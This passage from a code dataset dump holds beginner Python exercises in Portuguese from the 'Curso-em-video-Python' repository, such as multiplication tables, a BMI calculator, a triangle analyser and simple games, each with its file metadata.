"text": "print('=====TABUADA=====')\r\nn1=int(input('Digite um número e mostraremos sua tabuada: '))\r\num=n1*1\r\ndois=n1*2\r\ntres=n1*3\r\nquatro=n1*4\r\ncinco=n1*5\r\nseis=n1*6\r\nsete=n1*7\r\noito=n1*8\r\nnove=n1*9\r\ndez=n1*10\r\nprint('A tabuada desse número é ')\r\nprint(n1, 'x 1 =' ,um)\r\nprint(n1, 'x 2 =' ,dois)\r\nprint(n1, 'x 3 =' ,tres)\r\nprint(n1, 'x 4 =' ,quatro)\r\nprint(n1, 'x 5 =' ,cinco)\r\nprint(n1, 'x 6 =' ,seis)\r\nprint(n1, 'x 7 =' ,sete)\r\nprint(n1, 'x 8 =' ,oito)\r\nprint(n1, 'x 9 =' ,nove)\r\nprint(n1, 'x 10 =' ,dez)\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.50390625,
"alphanum_fraction": 0.59765625,
"avg_line_length": 40.66666793823242,
"blob_id": "5c29280b4b2c439b10ab0c7f48627d97757b3d33",
"content_id": "e3de170ab27424ac16e41498b3a378419646c645",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 258,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 6,
"path": "/ex049.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('\\033[1;97m-=-' *5, '\\033[1;36mTABUADA V2', '\\033[1;97m-=-' *5)\r\nprint('')\r\nvalor = int(input('Digite um número e será mostrado sua Tabuada '))\r\nprint('')\r\nfor tabuada in range(1, 11):\r\n print('{} x {} = {}'.format(valor, tabuada,valor*tabuada))\r\n"
},
{
"alpha_fraction": 0.63923180103302,
"alphanum_fraction": 0.6502057909965515,
"avg_line_length": 30.68181800842285,
"blob_id": "871b5bc2c9ed40f8c2ad1977ad3cabdec15ef184",
"content_id": "9c439701ce7ddf2bb0fd23d0408455558deaa1fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 739,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 22,
"path": "/ex039.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "from datetime import date\r\n\r\nano = int(input('Quer saber quando deve se alistar? Digite o ano em que você nasceu '))\r\n\r\nano_atual = date.today().year\r\nrestante = ano - ano_atual\r\nidade = ano_atual - ano\r\nquanto_falta = 18 - idade\r\nprint(' ')\r\nprint('Quem nasceu em {} tem {} anos em {}'.format(ano, idade, ano_atual))\r\nprint(' ')\r\n\r\nif ano_atual - ano < 18:\r\n print('Você ainda é novo, aproveite seu tempo, faltam {} anos para você se alistar'.format(quanto_falta))\r\nelif ano_atual - ano > 18:\r\n\r\n quanto_falta = idade - 18\r\n print('''URGENTE\r\nVocê já tinha que ter se alistado á {} anos, Vá se alistar AGORA!'''.format(quanto_falta))\r\n\r\nelse:\r\n print('Vá logo fazer seu alistamento, está na hora exata!')\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.583106279373169,
"alphanum_fraction": 0.6158038377761841,
"avg_line_length": 34.5,
"blob_id": "b6a9f4e45d4354acbcaa4b9db1b1973cf8da80d8",
"content_id": "6b9261606ddea370764eccc2733b86a600f80dda",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 374,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 10,
"path": "/ex032.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "from datetime import date\r\nano = int(input('Qual ano você deseja que eu verifique se é BISSEXTO ou Não ? Digite 0 para verificar o ano em que você esta ! '))\r\nif ano == 0:\r\n ano = date.today().year\r\n\r\nif ano % 100 != 0 and ano % 4 == 0 or ano % 400 == 0:\r\n print('O Ano {} é BISSEXTO'.format(ano))\r\n\r\nelse:\r\n print('O Ano {} não é BISSEXTO'.format(ano))\r\n\r\n"
},
{
"alpha_fraction": 0.43091335892677307,
"alphanum_fraction": 0.46370023488998413,
"avg_line_length": 23,
"blob_id": "96142ee8cac6c8e5bfa16b7fc28be17b6c642ec0",
"content_id": "1555167d689c5220b20e1a1f9e49415f52413251",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/ex067.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('-' * 15)\r\nprint(' Tabuava v3.0')\r\nprint('-' * 15)\r\n\r\nwhile True:\r\n print('')\r\n n = int(input('Digite o número que você deseja ver a tabuada: '))\r\n print('')\r\n print('-' * 15)\r\n if n > 0:\r\n for c in range(1, 11):\r\n soma = n * c\r\n print('{} * {} = {}'.format(n, c, soma))\r\n print('-' * 15)\r\n else:\r\n break\r\nprint('PROGRAMA TABUADA ENCERRADO. VOLTE SEMPRE!')\r\n\r\n"
},
{
"alpha_fraction": 0.617977499961853,
"alphanum_fraction": 0.6385768055915833,
"avg_line_length": 33.46666717529297,
"blob_id": "976811658df252c375b3d6907688eeaaa742b13f",
"content_id": "c553393a7bfaf7f8abbe542af2749a821c4b5485",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 537,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 15,
"path": "/ex029.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "\r\nprint('-_-' *10)\r\nprint('-----RADAR DE VELOCIDADE-----')\r\nprint('-_-' * 10)\r\nvelocidadeatual = float(input('Qual a sua velocidade Atual ? '))\r\nmulta = velocidadeatual - 80\r\nvalormulta = multa * 7\r\n\r\nif velocidadeatual <= 80:\r\n print('---BOM DIA---!')\r\n print('TENHA UMA ÓTIMA VIAGEM')\r\n print('OBRIGADO POR RESPEITAR A VELOCIDADE PERMITIDA')\r\nelse:\r\n print('VOCÊ FOI MULTADO EM UM VALOR DE R${}'.format(valormulta))\r\n print('DIMINUA SUA VELOCIDADE !')\r\n print('A VELOCIDADE PERMITIDA PARA ESSA PISTA É 80Km/h !')\r\n"
},
{
"alpha_fraction": 0.6448087692260742,
"alphanum_fraction": 0.6448087692260742,
"avg_line_length": 34.599998474121094,
"blob_id": "5dbbc79274a3ad8d16c755192c787184a1450ce6",
"content_id": "6645aa0c263d60b33dadd8a4a3f8bf277dec9d00",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 185,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 5,
"path": "/ex060.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "from math import factorial\r\nn = int(input('Digite um número: '))\r\nprint('Iremos mostrar o fatorial de {}.'.format(n))\r\nf = factorial(n),\r\nprint('O fatorial de {} é {}'.format(n, f))\r\n"
},
{
"alpha_fraction": 0.40931373834609985,
"alphanum_fraction": 0.533088207244873,
"avg_line_length": 23.935483932495117,
"blob_id": "29eb74b00e7e2f545cbb523311a48f627f0f0a68",
"content_id": "c592e049bb5cc452f3a025e0f011a4d03835821c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 822,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 31,
"path": "/ex042.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('\\033[1;31m-=-' *10)\r\nprint(\"\"\" \r\n \\033[1;97mANALISADOR \r\n \\033[1;35mDE \r\n \\033[1;36mTRIANGULOS \r\n \\033[1;33mV2\"\"\")\r\nprint(' ')\r\nprint('\\033[1;031m-=-' *10)\r\nprint('\\033[0;0m')\r\nv1 = float(input('Digite um valor: '))\r\nv2 = float(input('Digite outro valor: '))\r\nv3 = float(input('Digite outro valor: '))\r\nprint(''' \r\n''')\r\n\r\nif v1 < v2 + v3 and v2 < v1 + v3 and v3 < v1 + v2:\r\n print('\\033[1;97mEsses valores podem formar um triângulo, Esse triangulo é; ')\r\n\r\n if v1 != v2 and v2 != v3 and v1 != v3:\r\n print('\\033[1;31mESCALENO')\r\n\r\n\r\n elif v1 == v2 and v2 == v3 and v3 == v1:\r\n print('\\033[1;36mEQUILÁTERO')\r\n\r\n\r\n else:\r\n print('\\033[1;33mISÓCELES')\r\n\r\nelse:\r\n print('\\033[1;97mEsses valores não podem formar um triângulo.')\r\n\r\n\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.5805084705352783,
"alphanum_fraction": 0.5932203531265259,
"avg_line_length": 31.428571701049805,
"blob_id": "dbadf5da086dd38bec75dc48c01e7356cd3b013a",
"content_id": "c3e793f13a98f6834fca43927ff1abfa0de3c318",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 7,
"path": "/ex051.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "termo = int(input('Digite o primeiro termo: '))\r\nrazao = int(input('Agora digite a Razão: '))\r\ndecimo = termo + (10 - 1) * razao\r\n\r\nfor c in range(termo,decimo + razao, razao):\r\n print('{} '.format(c), end='-> ')\r\nprint('ACABOU')\r\n\r\n"
},
{
"alpha_fraction": 0.45529574155807495,
"alphanum_fraction": 0.5969738364219666,
"avg_line_length": 35.94736862182617,
"blob_id": "3f002b544853d2a81175506e87c175251d26cdf9",
"content_id": "31974990f5dddb23448724c238059da840c41a2b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 740,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 19,
"path": "/ex043.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('\\033[1;36m-=-\\033[1;36m'*5)\r\nprint('\\033[1;31m Calculadora\\033[1;31m')\r\nprint('\\033[1;31m IMC\\033[1;31m')\r\nprint('\\033[1;36m-=-\\033[1;36m'*5)\r\n\r\n\r\npeso = float(input('\\033[0;97mQual o seu Peso em KG? '))\r\naltura = float(input('Qual a sua altura em M?\\033[0;97m'))\r\nprint('')\r\nimc = peso / (altura**2)\r\n\r\nif imc < 18.5:\r\n print('\\033[1;31mSeu IMC é {:.2f}, você está abaixo do Peso!'.format(imc))\r\nelif imc > 18.5 and imc < 25:\r\n print('\\033[1;32mSeu IMC é {:.2f}, você está no peso Ideal!'.format(imc))\r\nelif imc >= 25 and imc <= 40:\r\n print('\\033[1;33mSeu IMC é {:.2f}, você está Obeso!'.format(imc))\r\nelse:\r\n print('\\033[1;34mSeu IMC é {:.2f}, você está com Obesidade Mórbida!!!'.format(imc))\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.686274528503418,
"alphanum_fraction": 0.6941176652908325,
"avg_line_length": 40.5,
"blob_id": "bf31eed5d80d0b01c5cb60209b7b471f361a2422",
"content_id": "c95f55fc275dfe03f8f6c28da01eff538bb312a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 260,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 6,
"path": "/ex011.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "largura=float(input('Qual a largura da parede ? '))\r\naltura=float(input('Qual a altura da parede ? '))\r\na=largura*altura\r\ntinta=(a/2)\r\nprint('A área de sua parede é quivalente a',a,'m²')\r\nprint('Você irá precisar de' ,tinta,'L para pintar essa parede.')\r\n"
},
{
"alpha_fraction": 0.5727272629737854,
"alphanum_fraction": 0.5909090638160706,
"avg_line_length": 25.75,
"blob_id": "9dc8367e11ba5021bfb0ef7764e2d4102bf2e1fe",
"content_id": "3755bcc492f5d7528dea0e06c7a20867f40fcb9f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 221,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 8,
"path": "/ex061.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "termo = int(input('Digite o primeiro Termo: '))\r\nrazao = int(input('Agora digite a Razão: '))\r\ndecimo = termo + (10 - 1) * razao\r\n\r\nwhile decimo > 0:\r\n print('{}'.format(decimo), end='->' )\r\n break\r\nprint('ACABOU')"
},
{
"alpha_fraction": 0.6339755058288574,
"alphanum_fraction": 0.6497372984886169,
"avg_line_length": 27.947368621826172,
"blob_id": "f661051317da3f0096147fe680ee56fd84e4233f",
"content_id": "4d5c5815f0e143b5cf80f3f0cfea450d4d9fb666",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 579,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 19,
"path": "/ex028.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "import random\r\nimport colorsys\r\nimport time\r\nprint('-=-' *20)\r\nprint('Vou pensar em um número entre 0 e 5. Tente adivinhar...')\r\nprint('-=-' *20)\r\nrandomn = random.randrange(0, 5)\r\n#sorte = input(int('Qual sera o número de sua tentativa ?')\r\n#sorte=input(int('Qual será sua tentativa ?'))\r\nsorte=int(input('Qual será sua tentativa ? '))\r\nprint('PROCESSANDO...')\r\ntime.sleep(2)\r\n\r\nif randomn == sorte:\r\n print('PARABÉNS VOCÊ GANHOU !!!')\r\n\r\nelse:\r\n print('QUE PENA VOCÊ ERROU, TENTE NOVAMENTE !!!')\r\n print('O número pensado por mim, foi {}' .format(randomn))\r\n\r\n"
},
{
"alpha_fraction": 0.5090090036392212,
"alphanum_fraction": 0.5900900959968567,
"avg_line_length": 29.428571701049805,
"blob_id": "5011ae7ad87b20463bba1a3d4585099a57319382",
"content_id": "b1436c16337ee27ed317bdd211c7b1203194ef47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 225,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 7,
"path": "/ex008.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "n1=float(input('Digite a medida em metros '))\r\ncm=n1*100\r\nmm=n1*1000\r\nkm=n1/1000\r\nprint('A medida em cm de',n1, 'é' ,cm,'cm')\r\nprint('A medida em mm de' ,n1, 'é' ,mm,'mm')\r\nprint('A medida em km de' ,n1, 'é' ,km,'km')\r\n\r\n"
},
{
"alpha_fraction": 0.6117021441459656,
"alphanum_fraction": 0.6223404407501221,
"avg_line_length": 45,
"blob_id": "222baec2caf29664aecfe09ee9b41b439c7da523",
"content_id": "670adfc4585e8770050257db3c9737fff427acdf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 190,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 4,
"path": "/ex027.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "nome = str(input('Digite seu nome completo ')).strip()\r\nn= nome.split()\r\nprint('Seu primeiro nome é {}' .format(nome.split(' ')[0]))\r\nprint('E seu ultimo nome é {}' .format(n[len(n)-1]))\r\n"
},
{
"alpha_fraction": 0.5934959053993225,
"alphanum_fraction": 0.6016260385513306,
"avg_line_length": 28.75,
"blob_id": "7c60b42e613b1c0edd6bdb45ea0f5bb4ba2f01a9",
"content_id": "2a2e55135c129ebb8556e7f2257a98334ff1e5fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 124,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 4,
"path": "/ex024.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "cid = str(input('Qual a cidade onde você mora? '))\r\nsplit = cid.split(\" \")[0].lower()\r\none = split == 'santo'\r\nprint(one)\r\n"
},
{
"alpha_fraction": 0.49761903285980225,
"alphanum_fraction": 0.5321428775787354,
"avg_line_length": 34.60869598388672,
"blob_id": "b7d1b741a9888926dfc218ec7e205a397ebf3e47",
"content_id": "197b6ae0676d3b2a24065b9baab543ddbfa09492",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 840,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 23,
"path": "/ex069.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "mais18 = qtdhomem = mulheresmenos20 = 0\r\nwhile True:\r\n sexo = str(input('Qual o seu sexo? [M/F]: ')).upper()\r\n idade = int(input('Digite sua idade: '))\r\n print('Dados Cadastrados com sucesso.')\r\n option = str(input('Deseja cadastrar uma nova pessoa? [S/N]')).upper()\r\n if sexo == \"F\":\r\n if idade >= 18:\r\n mais18 += 1\r\n if idade < 20:\r\n mulheresmenos20 += 1\r\n if sexo == 'M':\r\n qtdhomem += 1\r\n if idade > 18:\r\n mais18 += 1\r\n if option == 'S':\r\n print('Ok. Digite os novos dados...')\r\n elif option == 'N':\r\n print('Ok')\r\n print('{} pessoas tem mais de 18 anos.'.format(mais18))\r\n print('Foram cadastrados {} homens.'.format(qtdhomem))\r\n print('Tem {} mulheres com menos de 20 anos.'.format(mulheresmenos20))\r\n break"
},
{
"alpha_fraction": 0.618881106376648,
"alphanum_fraction": 0.6223776340484619,
"avg_line_length": 44.33333206176758,
"blob_id": "ea39ef1eb108ab1ede0247ab806890c1cc9a4ca6",
"content_id": "09d7f4b7ce15aa0af217207fd19b37c9c5e4710a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 289,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 6,
"path": "/ex012.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "nome = str(input('Digite seu nome: '))\r\nprint('Analisando seu nome...')\r\nprint('Seu nome em maisculas é ' + nome.upper())\r\nprint('Seu nome em minusculo é ' + nome.lower())\r\nprint('Seu nome tem ao todo ', len(nome), 'Letras')\r\nprint('Seu primeiro nome é ' + nome.split(\" \")[0])\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6571428775787354,
"alphanum_fraction": 0.668571412563324,
"avg_line_length": 41.25,
"blob_id": "8a18bac65f4f9f00d756d50b47c1ddc320d741ed",
"content_id": "e4fb34b8cb085263dfd472e93290b5661447eb15",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 182,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 4,
"path": "/ex010.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "d1=float(input('Quantos R$ você tem em sua carteira ? '))\r\ndol=float(input('Qual a cotação do dólar atual ? '))\r\nres=(d1/dol)\r\nprint('Você poderá comprar' ,res, 'dólares')\r\n\r\n"
},
{
"alpha_fraction": 0.5198938846588135,
"alphanum_fraction": 0.5596817135810852,
"avg_line_length": 20.294116973876953,
"blob_id": "84d91d7113e5840936ac8a907e120f286b14a8a2",
"content_id": "306c5709f1374e9deea6c61c2f27cc0df0a47f63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 102,
"num_lines": 17,
"path": "/ex064.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "totalnumero = 0\r\nsomanumero = 0\r\n\r\nn = 0\r\nwhile n < 999:\r\n if n >= 0 and n < 999:\r\n somanumero += n\r\n n = int(input('Digite um número. [999 para parar]: '))\r\n totalnumero += 1\r\n\r\n\r\n else:\r\n print('Opção Inválida. Tente Novamente!!!')\r\n\r\n\r\n\r\nprint('Você digitou um total de {} números, e a soma deles é {}'.format(totalnumero - 1, somanumero ))"
},
{
"alpha_fraction": 0.5714285969734192,
"alphanum_fraction": 0.61654132604599,
"avg_line_length": 29.75,
"blob_id": "e7a132ddf12a7965a114501aa0215a4441e297d9",
"content_id": "2d993e3d8ca34bbe13d9e2020df846cbd44be4ab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 136,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 4,
"path": "/ex005.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "n1=int(input('Digite um número: '))\r\nsuces=n1+1\r\nantec=n1-1\r\nprint('O Sucessor de',n1, 'é' ,suces, 'e o antecessor é',antec,)\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6142857074737549,
"alphanum_fraction": 0.6714285612106323,
"avg_line_length": 41.75,
"blob_id": "2b6ab44564d2f34982b5f2f82782e9e2d5401400",
"content_id": "2f47d009790553ac434c62f8b9401bd030b45eb6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 354,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 8,
"path": "/ex034.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "salario_base = float(input('Qual é o salario atual do Funcionário? R$'))\r\n\r\nif salario_base <= 1250:\r\n salario15 = salario_base * 1.15\r\n print('O ajuste salaria fara com que você receba R${:.2f}'.format(salario15))\r\nelse:\r\n salario10 = salario_base * 1.10\r\n print('O ajuste salarial fara com que você receba R${:.2f}'.format(salario10))\r\n"
},
{
"alpha_fraction": 0.49964261054992676,
"alphanum_fraction": 0.5096497535705566,
"avg_line_length": 36.69444274902344,
"blob_id": "8a087e8361d36232ddb24ba683ba02ad4a5132ce",
"content_id": "7772d00bfbc2f1f7202c8c8f100bd6b7b8299beb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1424,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 36,
"path": "/ex068.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "from random import randint\r\nfrom time import sleep\r\n\r\nqtdwins = 0\r\n\r\nwhile True:\r\n número = int(input('Digite um Número: '))\r\n opção = str(input('[P/I]: ')).upper()\r\n computador = randint(0, 10)\r\n soma = número + computador\r\n if opção == 'P':\r\n if (soma % 2) == 0:\r\n print('Você Jogou {} e o computador {}. Total {}, DEU PAR.'.format(número, computador, soma))\r\n print('Você Venceu!')\r\n print('Vamos jogar Novamente...')\r\n sleep(0.5)\r\n qtdwins += 1\r\n else:\r\n print('Você Jogou {} e o computador {}. Total {}, DEU ÍMPAR.'.format(número, computador, soma))\r\n print('Computador Venceu!')\r\n print('')\r\n print('GAME OVER, Você teve {} Vitórias Seguidas.'.format(qtdwins))\r\n break\r\n if opção == 'I':\r\n if (soma % 2) == 0:\r\n print('Você jogou {} e o computador {}. Total {}, DEU PAR.'.format(número, computador, soma))\r\n print('Computador Venceu!')\r\n print('')\r\n print('GAME OVER, Você teve {} Vitórias Seguidas.'.format(qtdwins))\r\n break\r\n else:\r\n print('Você Jogou {} e o computador {}. Total {}, DEU ÍMPAR.'.format(número, computador, soma))\r\n print('Você Venceu!')\r\n print('Vamos jogar Novamente...')\r\n sleep(0.5)\r\n qtdwins += 1\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6079812049865723,
"alphanum_fraction": 0.6267605423927307,
"avg_line_length": 30.769229888916016,
"blob_id": "bde3609e84ee94c54a28bf735f6ae5980798da8e",
"content_id": "3d8adaffc5f9e608da4270633024eabcd788bdfb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 429,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 13,
"path": "/ex054.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "from datetime import date\r\ntotal_maior = 0\r\ntotal_menor = 0\r\n\r\n\r\nfor pessoas in range(1, 8):\r\n ano = int(input('Qual o ano de Nascimento da {}° Pessoa? '.format(pessoas)))\r\n idade = date.today().year - ano\r\n if idade >= 18:\r\n total_maior = total_maior + 1\r\n else:\r\n total_menor = total_menor + 1\r\nprint('Nesta opções temos {} pessoas maiores e {} pessoas menores.'.format(total_maior, total_menor))\r\n"
},
{
"alpha_fraction": 0.4724857807159424,
"alphanum_fraction": 0.622390866279602,
"avg_line_length": 32.599998474121094,
"blob_id": "a14a4a0d0f26fb0cc61b278d4d7095d881949284",
"content_id": "3d7f51454beff1dbe859cf77816a44311d2fb76b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 531,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 15,
"path": "/ex035.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('-=-'*10)\r\nprint(' \\033[1;30mANALISADOR\\033[1;30m \\033[1;31mDE\\033[1;31m \\033[1;32mTRIÂNGULOS V1\\033[1;32m')\r\nprint('-=-'*10)\r\nprint(' ')\r\nprint('-'*20)\r\nprint(' ')\r\n\r\nr1 = float(input('Primeiro segmento: '))\r\nr2 = float(input('Segundo segmento: '))\r\nr3 = float(input('Terceiro Segmento: '))\r\n\r\nif r1 < r2 + r3 and r2 < r1 + r3 and r3 < r1 + r2:\r\n print('\\033[1;36mOs segmentos acima PODEM FORMAR triângulo!\\033[1;36m')\r\nelse:\r\n print('\\033[0;31mOs segmentos acima NÃO PODEM FORMAR triângulo!\\033[0;31m')\r\n\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6070266962051392,
"alphanum_fraction": 0.6297982931137085,
"avg_line_length": 40.69444274902344,
"blob_id": "9f368e19cb8f6ececdd84a9597faeef42d5d8801",
"content_id": "dde4b6bc058c789955d6ae93cb5e2f6c16e012a4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1567,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 36,
"path": "/ex044.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "print('{:=^40}'.format(' LOJAS TONINHO '))\r\nprint('')\r\nvalor = float(input('Qual o valor do produto R$'))\r\nprint('')\r\n\r\nprint('[1] à vista DINHEIRO/CHEQUE') #10%desconto\r\nprint('[2] à vista CARTÃO') #5%desconto\r\nprint('[3] até 2x no CARTÃO') #preço formal\r\nprint('[4] 3x ou mais no CARTÃO') #20%juros\r\nprint(' ')\r\nres = int(input('De que modo será realizado o pagamento?'))\r\nprint(' ')\r\nif res == 1:\r\n valor_final = valor * 0.10\r\n valor_final2 = valor - valor_final\r\n print('A opção escolhida gera um desconto de 10%')\r\n print('O valor final de seu produto é R${}'.format(valor_final2))\r\n print('Você economizou um total de R${}'.format(valor_final))\r\nelif res == 2:\r\n valor_final = valor * 0.05\r\n valor_final2 = valor - valor_final\r\n print('A opção escolhida gera um desconto de 5%')\r\n print('O valor final de seu produto é R${}'.format(valor_final2))\r\n print('Você economizou um total de R${}'.format(valor_final))\r\nelif res == 3:\r\n print('A opção escolhida não gera nenhum desconto.')\r\n print('O valor final de seu produto é R${}'.format(valor))\r\nelif res == 4:\r\n parcela = int(input('Quantas vezes você quer parcelar esse pagamento? '))\r\n valor1 = valor * 1.2\r\n parcela_mes = valor1 / parcela\r\n print('A opção escolhida contém juros!')\r\n print('O valor final de seu produto é R${}'.format(valor1, parcela))\r\n print('O valor de cada parcela será de R${} por mês'.format(parcela_mes))\r\nelse:\r\n print('Opção INVÁLIDA DE PAGAMENTO. Tente Novamente!')\r\n"
},
{
"alpha_fraction": 0.6600000262260437,
"alphanum_fraction": 0.6657142639160156,
"avg_line_length": 48,
"blob_id": "8b23277303d0f8cbf2dfc1ed1da72553f9fc47b4",
"content_id": "e673f44d71f2a34584608ee831e1a7128e0f18b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 354,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 7,
"path": "/ex026.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "frase = str(input('Digite uma frase ')).lower().strip()\r\na = frase.count('a')\r\nppos = frase.find('a') + 1\r\nupos = frase.rfind('a') + 1\r\nprint('Na sua frase a palavra A aparece {} vezes'.format(a))\r\nprint('Em sua frase a primeira letra A aparece na posição {}'.format(ppos))\r\nprint('Em sua frase a ultima letra A aparece na posição {}'.format(upos))\r\n"
},
{
"alpha_fraction": 0.5861027240753174,
"alphanum_fraction": 0.6087613105773926,
"avg_line_length": 24.399999618530273,
"blob_id": "26264101fab9b20b95743595b62ecd7614fe9e15",
"content_id": "580c07f95a13e6443c20578199bd2db470026cbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 669,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 25,
"path": "/ex041.py",
"repo_name": "ToninALV/Curso-em-video-Python",
"src_encoding": "UTF-8",
"text": "from datetime import date\r\n\r\nnasc = int(input('Digite seu ano de nascimento, e iremos mostrar sua categoria.'))\r\nano_atual = date.today().year\r\nidade = ano_atual - nasc\r\n\r\nif idade < 0 and idade <= 9:\r\n print('MIRIM')\r\n print('Você tem {} anos'.format(idade))\r\n\r\nelif idade > 9 and idade <= 14:\r\n print('INFANTIL')\r\n print('Você tem {} anos'.format(idade))\r\n\r\nelif idade > 14 and idade <= 19:\r\n print('JÚNIOR')\r\n print('Você tem {} anos'.format(idade))\r\n\r\nelif idade > 19 and idade <= 25:\r\n print('SÊNIOR')\r\n print('Você tem {} anos'.format(idade))\r\n\r\nelif idade > 25:\r\n print('MASTER')\r\n print('Você tem {} anos'.format(idade))\r\n\r\n"
},
{
"alpha_fraction": 0.5584642291069031,
"alphanum_fraction": 0.6352530717849731,
"avg_line_length": 26.649999618530273,
